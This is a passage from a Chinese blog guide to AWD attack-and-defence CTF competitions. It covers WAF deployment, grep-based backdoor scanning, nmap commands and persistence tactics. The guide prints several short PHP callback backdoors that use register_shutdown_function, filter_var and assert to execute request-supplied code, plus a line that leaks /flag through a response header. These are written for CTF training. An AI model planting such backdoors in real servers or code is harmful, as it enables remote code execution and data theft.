<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">sudo</span> <span class="token function">service</span> php7.0-fpm restart</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">sudo</span> systemctl restart php7.0-fpm.service</pre></td></tr></tbody></table></figure><h3 id="waf部署"><a class="anchor" href="#waf部署">#</a> waf 部署</h3>
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="https://ctf-learner.github.io/post/AWD-waf%E8%84%9A%E6%9C%AC/">脚本传送门</a><br>
 php.ini 选项：auto_prepend_file = 与 auto_append_file =waf.php</p>
<p>waf 脚本，<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/sharpleung/CTF-WAF">项目戳这里</a>，<a target="_blank" rel="noopener external nofollow noreferrer" href="http://t.csdnimg.cn/y4KoJ"> 部署看这里</a><br>
 WatchBrid 通防不允许用于比赛，第三方通防参考比赛规则<br>
<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/DasSecurity-HatLab/AoiAWD"> AoiAWD 戳这里</a><br>
<a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.freebuf.com/sectool/234402.html"> WatchBrid 防火墙戳这里</a></p>
<h3 id="php代码审计"><a class="anchor" href="#php代码审计">#</a> php 代码审计</h3>
<p>扫描预留后门，扫描目录，寻找后门，注释代码<br>
 cms 框架的 cve、常见的漏洞等</p>
<div class="note success">
<p>这部分需要进攻防守同时进行，审计出漏洞后分工，一人补 waf、注释代码，一人写脚本、写 payload<br>
 具体放在 attack 部分讲解。</p>
</div>
<h3 id="远程登录加固"><a class="anchor" href="#远程登录加固">#</a> 远程登录加固</h3>
<p>暂时用不到，遇到再补充</p>
<h3 id="设置禁ping"><a class="anchor" href="#设置禁ping">#</a> 设置禁 Ping</h3>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token builtin class-name">echo</span> <span class="token string">"1"</span> <span class="token operator">&gt;</span> /proc/sys/net/ipv4/icmp_echo_ignore_all     //临时开启禁ping</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token builtin class-name">echo</span> <span class="token string">"0"</span> <span class="token operator">&gt;</span> /proc/sys/net/ipv4/icmp_echo_ignore_all     //关闭禁ping</pre></td></tr></tbody></table></figure><h1 id="进攻attack"><a class="anchor" href="#进攻attack">#</a> 进攻（attack）</h1>
<div class="note danger">
<p>一定要在前几轮脚本批量获取分数，到后面基本上是打卡下班了</p>
</div>
<h2 id="代码审计"><a class="anchor" href="#代码审计">#</a> 代码审计</h2>
<div class="note warning">
<p>各个靶机服务相同，可以先在主机代码审计，寻找简单漏洞。由易到难。</p>
</div>
<p>扫描预留后门，扫描目录，寻找后门，注释代码</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token comment"># 简单的查找后门 （不建议）</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">find</span> <span class="token builtin class-name">.</span> <span class="token parameter variable">-name</span> <span class="token string">'*.php'</span> <span class="token operator">|</span> <span class="token function">xargs</span> <span class="token function">grep</span> <span class="token parameter variable">-n</span> <span class="token string">'eval('</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token function">find</span> <span class="token builtin class-name">.</span> <span class="token parameter variable">-name</span> <span class="token string">'*.php'</span> <span class="token operator">|</span> <span class="token function">xargs</span> <span class="token function">grep</span> <span class="token parameter variable">-n</span> <span class="token string">'assert('</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token function">find</span> <span class="token builtin class-name">.</span> <span class="token parameter variable">-name</span> <span class="token string">'*.php'</span> <span class="token operator">|</span> <span class="token function">xargs</span> <span class="token function">grep</span> <span class="token parameter variable">-n</span> <span class="token string">'system('</span></pre></td></tr></tbody></table></figure><p><span class="red"><strong>推荐</strong></span><br>
打开 D 盾 / 安全狗 / 河马查杀，将 html 文件夹直接拖入</p>
<p>seay 源代码审计，或者 Rips 代码审计<br>
<a target="_blank" rel="noopener external nofollow noreferrer" href="https://blog.csdn.net/qq_43442524/article/details/101934481">工具</a></p>
<h2 id="metasploit工具"><a class="anchor" href="#metasploit工具">#</a> Metasploit 工具</h2>
<p><a href="">插个眼</a>，后续补上</p>
<h2 id="nmap扫描工具"><a class="anchor" href="#nmap扫描工具">#</a> nmap 扫描工具</h2>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre>nmap <span class="token parameter variable">-sP</span> ip/子网掩码</pre></td></tr><tr><td data-num="2"></td><td><pre>nmap <span class="token parameter variable">-sS</span> -p- <span class="token operator">&lt;</span>ip<span class="token operator">&gt;</span>  <span class="token comment"># 扫描主机所有端口</span></pre></td></tr><tr><td data-num="3"></td><td><pre>nmap <span class="token parameter variable">-Pn</span> <span class="token operator">&lt;</span>ip<span class="token operator">&gt;</span></pre></td></tr><tr><td data-num="4"></td><td><pre>nmap <span class="token parameter variable">-sV</span> <span class="token parameter variable">-A</span> <span class="token operator">&lt;</span>ip<span class="token operator">&gt;</span></pre></td></tr></tbody></table></figure><p>这里放一些常用的 nmap 命令，更多需求<a target="_blank" rel="noopener external nofollow noreferrer" href="https://ctf-learner.github.io/post/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/">戳这里</a></p>
<blockquote>
<p>学会读官方说明文档真的很重要，比起直接看别人写好的教程，会对工具的用法有更深的理解。<a target="_blank" rel="noopener external nofollow noreferrer" href="https://nmap.org/man/zh/index.html">nmap 中文文档</a></p>
</blockquote>
<h2 id="权限维持"><a class="anchor" href="#权限维持">#</a> 权限维持</h2>
<p>拿到 WEBSHELL 后，需要维持权限！简单的 WEBSHELL 一眼就会被识别，在 AWD 中优先考虑种不死马、反弹 SHELL 等留后门方式维持权限，以便后续刷 FLAG，再考虑提升权限。</p>
<h3 id="关于反弹shell"><a class="anchor" href="#关于反弹shell">#</a> 关于反弹 shell</h3>
<p>怎么写怎么藏怎么发现，买了服务器再学 hhhhh🥱🥱</p>
<h3 id="藏flag技术哪家强"><a class="anchor" href="#藏flag技术哪家强">#</a> 藏 flag 技术哪家强</h3>
<div class="note warning">
<p>第一次 getshell 之后不能得意，权限的维持时间有限，如果能把 flag 藏在某处持续得分才是大头任务</p>
</div>
<figure class="highlight php"><figcaption data-lang="PHP"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">header</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'flag:'</span><span class="token operator">.</span><span class="token function">base64_encode</span><span class="token punctuation">(</span><span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'/flag'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr></tbody></table></figure><p>条件允许的话，将 flag 信息直接读取并返回到 header 头中，这样做不易被发现。</p>
<h3 id="藏后门的n种方式"><a class="anchor" href="#藏后门的n种方式">#</a> 藏后门的 n 种方式</h3>
<p>直接放上 p 神的文章，膜拜一下</p>
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html">创造 tips 的秘籍 ——PHP 回调后门 | 离别歌 (leavesongs.com)</a></p>
<details class="info"><summary>👇整理了一下后门的脚本</summary><div>
<p>文章发布自 2015 年，目前各大 waf 都有了修补，参考着使用吧，脚本只做搬运，认真拜读</p>
<p><mark>单参数后门的终极奥义</mark></p>
<figure class="highlight php"><figcaption data-lang="PHP"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token php language-php"><span class="token delimiter important">&lt;?php</span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token variable">$e</span> <span class="token operator">=</span> <span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'e'</span><span class="token punctuation">]</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token function">register_shutdown_function</span><span class="token punctuation">(</span><span class="token variable">$e</span><span class="token punctuation">,</span> <span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'pass'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr></tbody></table></figure><figure class="highlight php"><figcaption data-lang="PHP"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token php language-php"><span class="token delimiter important">&lt;?php</span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token variable">$e</span> <span class="token operator">=</span> <span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'e'</span><span class="token punctuation">]</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token keyword">declare</span><span class="token punctuation">(</span>ticks<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token function">register_tick_function</span> <span class="token punctuation">(</span><span class="token variable">$e</span><span class="token punctuation">,</span> <span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'pass'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr></tbody></table></figure><figure class="highlight php"><figcaption data-lang="PHP"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token php language-php"><span class="token delimiter important">&lt;?php</span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">filter_var</span><span class="token punctuation">(</span><span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'pass'</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token constant">FILTER_CALLBACK</span><span class="token punctuation">,</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'options'</span> <span class="token operator">=&gt;</span> <span class="token string single-quoted-string">'assert'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr></tbody></table></figure><figure class="highlight php"><figcaption data-lang="PHP"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token php language-php"><span class="token delimiter important">&lt;?php</span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">filter_var_array</span><span class="token punctuation">(</span><span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'test'</span> <span class="token operator">=&gt;</span> <span class="token variable">$_REQUEST</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'pass'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'test'</span> <span class="token operator">=&gt;</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'filter'</span> <span class="token operator">=&gt;</span> <span class="token constant">FILTER_CALLBACK</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'options'</span> <span class="token operator">=&gt;</span> <span class="token string single-quoted-string">'assert'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr></tbody></table></figure><p>过去那么久了，php 也到了 8.1 的版本，后续有空测试一下这些后门还能用不</p>
</div></details>
<h4 id="关于不死马"><a class="anchor" href="#关于不死马">#</a> 关于不死马</h4>
<p><a href="">传送门</a></p>
<p>不死马可以权限维持，并且继续往服务器写入更多的马，不要仅限于 getflag</p>
<h1 id="一些批量脚本"><a class="anchor" href="#一些批量脚本">#</a> 一些批量脚本</h1>
<p>正在收集 ing~~~，等待更新</p>
<h1 id="参考文章"><a class="anchor" href="#参考文章">#</a> 参考文章：</h1>
<p><a target="_blank" rel="noopener external nofollow noreferrer" href="https://forum.butian.net/share/2536">https://forum.butian.net/share/2536</a><br>
<a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.cnblogs.com/qianfu/p/17530955.html">https://www.cnblogs.com/qianfu/p/17530955.html</a><br>
<a target="_blank" rel="noopener external nofollow noreferrer" href="http://t.csdnimg.cn/7nF7a">http://t.csdnimg.cn/7nF7a</a><br>
<a target="_blank" rel="noopener external nofollow noreferrer" href="https://www.cnblogs.com/liang2580/p/9147806.html">https://www.cnblogs.com/liang2580/p/9147806.html</a><br>
<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/AabyssZG/AWD-Guide">https://github.com/AabyssZG/AWD-Guide</a><br>
<a target="_blank" rel="noopener external nofollow noreferrer" href="http://t.csdnimg.cn/ucKKL">http://t.csdnimg.cn/ucKKL</a></p>
<div class="tags"><a href="/tags/AWD/" rel="tag"><i class="ic i-tag"></i>AWD</a><a href="/tags/kali/" rel="tag"><i class="ic i-tag"></i>kali</a></div></div><footer><div class="meta"><span class="icon"><i class="ic i-eye"></i></span><span>此文章已被阅读次数:</span><span class="waline-pageview-count" id="twikoo_visitors" data-path="post/2024/2024/AWD初体验/">正在加载...</span><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于</span><time title="修改时间：2025-11-10 01:40:30" itemprop="dateModified" datetime="2025-11-10T01:40:30+08:00">2025-11-10</time></span></div><div class="reward"><button><i class="ic i-heartbeat"></i>赞赏</button><p>请我喝[茶]~(￣▽￣)~*</p><div id="qr"><div><img loading="lazy" data-src="/assets/wechatpay.webp" alt="MorIo24 微信支付"><p>微信支付</p></div><div><img loading="lazy" data-src="/assets/alipay.webp" alt="MorIo24 支付宝"><p>支付宝</p></div></div></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>MorIo24<i class="ic i-at"><em>@</em></i>Glad to see U (◦˙▽˙◦)</li><li class="link"><strong>本文链接：</strong><a href="https://morio24.github.io/post/2024/2024/AWD%E5%88%9D%E4%BD%93%E9%AA%8C/" title="AWD初体验">https://morio24.github.io/post/2024/2024/AWD初体验/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener external nofollow noreferrer" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/post/2024/2024/%E6%90%AD%E5%8D%9A%E5%AE%A2%E4%B8%80%E8%B7%AF%E7%9A%84%E5%BF%83%E9%85%B8/" rel="prev" itemprop="url" data-background-image="https://s2.loli.net/2024/04/13/anqso9upMDLB6JS.jpg" title="搭博客一路的心酸"><span class="type">上一篇</span><span class="category"><i class="ic i-flag"></i>关于shokaX</span><h3>搭博客一路的心酸</h3></a></div><div class="item right"><a href="/post/2024/2024/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/" rel="next" itemprop="url" data-background-image="https://cdn.pixabay.com/photo/2016/10/21/14/50/plouzane-1758197_640.jpg" title="扫描不止 nc&amp;nmap"><span class="type">下一篇</span><span class="category"><i class="ic i-flag"></i>渗透测试</span><h3>扫描不止 nc&amp;nmap</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#awd%E6%94%BB%E7%95%A5"><span class="toc-number">1.</span> <span class="toc-text"> AWD 攻略</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%AF%94%E8%B5%9B%E6%B5%81%E7%A8%8B"><span class="toc-number">2.</span> <span class="toc-text"> 比赛流程</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%B5%9B%E5%89%8D%E5%87%86%E5%A4%87"><span class="toc-number">3.</span> <span class="toc-text"> 赛前准备</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%99%BB%E5%BD%95%E9%9D%B6%E6%9C%BA"><span class="toc-number">4.</span> <span class="toc-text"> 登录靶机</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ssh%E7%99%BB%E5%BD%95%E6%B3%A8%E6%84%8F%E7%AB%AF%E5%8F%A3"><span class="toc-number">4.1.</span> <span class="toc-text"> ssh 登录（注意端口）</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%94%B6%E9%9B%86%E4%BF%A1%E6%81%AF"><span class="toc-number">5.</span> <span class="toc-text"> 收集信息</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%98%8E%E7%A1%AElinux%E6%9C%BA%E5%99%A8%E4%BF%A1%E6%81%AF"><span class="toc-number">5.1.</span> <span class="toc-text"> 明确 Linux 机器信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E6%9C%8D%E5%8A%A1"><span class="toc-number">5.2.</span> <span class="toc-text"> 查看服务</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E5%BC%80%E6%94%BE%E7%AB%AF%E5%8F%A3"><span class="toc-number">5.3.</span> <span class="toc-text"> 查看开放端口</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%98%B2%E5%AE%88defence"><span class="toc-number">6.</span> <span class="toc-text"> 防守（defence）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9F%A5%E6%89%BE%E6%9C%AC%E5%9C%B0flag"><span class="toc-number">6.1.</span> <span class="toc-text"> 查找本地 flag</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9%E5%AF%86%E7%A0%81"><span class="toc-number">6.2.</span> <span class="toc-text"> 修改密码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%87%E4%BB%BD"><span class="toc-number">6.3.</span> <span class="toc-text"> 备份</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%87%E4%BB%BD%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-number">6.3.1.</span> <span class="toc-text"> 备份数据库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E9%97%AD-mysql-%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95"><span class="toc-number">6.3.2.</span> <span class="toc-text"> 关闭 MySQL 远程登录：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web%E5%8A%A0%E5%9B%BA"><span class="toc-number">6.4.</span> <span class="toc-text"> web 加固</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BE%E7%BD%AE%E6%9D%83%E9%99%90"><span class="toc-number">6.4.1.</span> <span class="toc-text"> 设置权限</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BD%91%E7%AB%99%E5%A4%87%E4%BB%BD"><span class="toc-number">6.4.2.</span> <span class="toc-text"> 网站备份</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A5%E5%BF%97%E8%AE%B0%E5%BD%95"><span class="toc-number">6.4.3.</span> <span class="toc-text"> 日志记录</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BE%E7%BD%AEhtaccess%E7%A6%81%E7%94%A8php%E8%84%9A%E6%9C%AC%E6%89%A7%E8%A1%8C"><span class="toc-number">6.4.4.</span> <span class="toc-text"> 设置.htaccess 禁用 php 脚本执行</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php%E5%8F%82%E6%95%B0%E5%AE%89%E5%85%A8%E9%85%8D%E7%BD%AE"><span class="toc-number">6.4.5.</span> <span class="toc-text"> php 参数安全配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#waf%E9%83%A8%E7%BD%B2"><span class="toc-number">6.4.6.</span> <span class="toc-text"> waf 部署</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#php%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">6.4.7.</span> <span class="toc-text"> php 代码审计</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E7%99%BB%E5%BD%95%E5%8A%A0%E5%9B%BA"><span class="toc-number">6.4.8.</span> <span class="toc-text"> 远程登录加固</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BE%E7%BD%AE%E7%A6%81ping"><span class="toc-number">6.4.9.</span> <span class="toc-text"> 设置禁 Ping</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%BF%9B%E6%94%BBattack"><span class="toc-number">7.</span> <span class="toc-text"> 进攻（attack）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">7.1.</span> <span class="toc-text"> 代码审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#metasploit%E5%B7%A5%E5%85%B7"><span class="toc-number">7.2.</span> <span class="toc-text"> Metasploit 工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#nmap%E6%89%AB%E6%8F%8F%E5%B7%A5%E5%85%B7"><span class="toc-number">7.3.</span> <span class="toc-text"> nmap 扫描工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81"><span class="toc-number">7.4.</span> <span class="toc-text"> 权限维持</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">7.4.1.</span> <span class="toc-text"> 关于反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%97%8Fflag%E6%8A%80%E6%9C%AF%E5%93%AA%E5%AE%B6%E5%BC%BA"><span class="toc-number">7.4.2.</span> <span class="toc-text"> 藏 flag 技术哪家强</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%97%8F%E5%90%8E%E9%97%A8%E7%9A%84n%E7%A7%8D%E6%96%B9%E5%BC%8F"><span class="toc-number">7.4.3.</span> <span class="toc-text"> 藏后门的 n 种方式</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E4%B8%8D%E6%AD%BB%E9%A9%AC"><span class="toc-number">7.4.3.1.</span> <span class="toc-text"> 关于不死马</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E6%89%B9%E9%87%8F%E8%84%9A%E6%9C%AC"><span class="toc-number">8.</span> <span class="toc-text"> 一些批量脚本</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="toc-number">9.</span> <span class="toc-text"> 参考文章：</span></a></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li class="active"><a href="/post/2024/2024/AWD%E5%88%9D%E4%BD%93%E9%AA%8C/" rel="bookmark" title="AWD初体验">AWD初体验</a></li><li><a href="/post/2024/2024/AWD-waf%E8%84%9A%E6%9C%AC/" rel="bookmark" title="AWD-waf脚本">AWD-waf脚本</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="MorIo24" src="/assets/avatar.webp"><p class="name" itemprop="name">MorIo24</p><div class="description" itemprop="description">With Great Power Comes Great Responsibilities</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">18</span><span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">6</span><span class="name">分类</span></a></div><div class="item tags"><a href="/tags/"><span class="count">14</span><span class="name">标签</span></a></div></nav><div class="social"><a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/ctf-learner" class="item github" title="https://github.com/ctf-learner"><i class="ic i-github"></i></a><a target="_blank" rel="noopener external nofollow noreferrer" href="https://gitee.com/morio24" class="item gitee" title="https://gitee.com/morio24"><i class="ic i-gitee"></i></a><a href="gmail:morio24@qq.com" rel="external nofollow noreferrer" class="item email" title="gmail:morio24@qq.com"><i class="ic i-envelope"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/about/me" rel="section"><i class="ic i-user"></i>关于</a></li><li class="item dropdown"><a href="#" onclick="return false;"><i class="ic i-feather"></i>文章</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li></ul></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-coffee"></i>友链</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/post/2024/2024/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/post/2024/2024/%E6%90%AD%E5%8D%9A%E5%AE%A2%E4%B8%80%E8%B7%AF%E7%9A%84%E5%BF%83%E9%85%B8/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/CTF-WP/" title="分类于CTF-WP">CTF-WP</a></div><span><a href="/post/2025/2025/HKctf-%E9%A6%99%E6%B8%AF-2025WP/">HKctf(香港)-2025WP</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/AI/" title="分类于AI">AI</a></div><span><a href="/post/2026/2026/AI%E5%B7%A5%E5%85%B7%E7%9C%9F%E7%9A%84%E8%83%BD%E8%A7%A3%E6%94%BE%E9%87%8D%E5%A4%8D%E6%80%A7%E8%84%91%E5%8A%9B%E5%8A%B3%E5%8A%A8%E5%90%97%EF%BC%9F/">AI工具真的能解放重复性脑力劳动吗？</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/post/2025/2025/%E5%9F%9F%E6%B8%97%E9%80%8F%E5%85%A5%E9%97%A8-vultarget-a%E9%9D%B6%E5%9C%BA/">域渗透入门：vultarget-a靶场</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTF-WEB/" title="分类于CTF-WEB">CTF-WEB</a></div><span><a href="/post/2025/2025/LFI%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-%E4%BB%8E%E5%85%A5%E9%97%A8%E5%88%B0%E5%85%A5%E5%9D%9F/">LFI文件包含-从入门到入坟</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTF-WEB/" title="分类于CTF-WEB">CTF-WEB</a></div><span><a href="/post/2024/2024/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95%E5%8F%8A%E5%90%84%E7%A7%8D%E7%BB%95%E8%BF%87%E9%AA%9A%E5%A7%BF%E5%8A%BF/">PHP反序列化-魔术方法及各种绕过骚姿势</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTF-WP/" title="分类于CTF-WP">CTF-WP</a></div><span><a href="/post/2025/2025/2025%E5%BC%BA%E7%BD%91s9WP-Ab1azE/">2025强网s9WP - Ab1azE</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/AWD/" title="分类于AWD">AWD</a></div><span><a href="/post/2024/2024/AWD%E5%88%9D%E4%BD%93%E9%AA%8C/">AWD初体验</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" title="分类于渗透测试">渗透测试</a></div><span><a href="/post/2024/2024/%E6%89%AB%E6%8F%8F%E4%B8%8D%E6%AD%A2-nc-nmap/">扫描不止 nc&amp;nmap</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTF-WP/" title="分类于CTF-WP">CTF-WP</a></div><span><a href="/post/2025/2025/2025%E8%83%BD%E6%BA%90%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9BWP/">2025能源安全大赛WP</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/CTF-WP/" title="分类于CTF-WP">CTF-WP</a></div><span><a href="/post/2025/2025/%E7%AC%AC%E4%BA%8C%E5%B1%8AParloo%E6%9D%AF-%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E5%A4%A7%E8%B5%9BWP/">第二届Parloo杯-应急响应大赛WP</a></span></li></ul></div></div><div class="status"><div class="copyright">© 追风赶月莫停留，平芜尽处是春山 -<span itemprop="copyrightYear">2026</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">MorIo24 @ MorIo24's blog</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">586k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">8:52</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener external nofollow noreferrer" href="https://hexo.io/">Hexo</a> &amp; Theme.<a target="_blank" rel="noopener external nofollow noreferrer" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div></div></div></footer></div><script src="https://fastly.jsdelivr.net/npm/live2d-widgets@1.0.0/dist/autoload.js"></script><script data-config="" type="text/javascript">var LOCAL = {
    ispost: true,
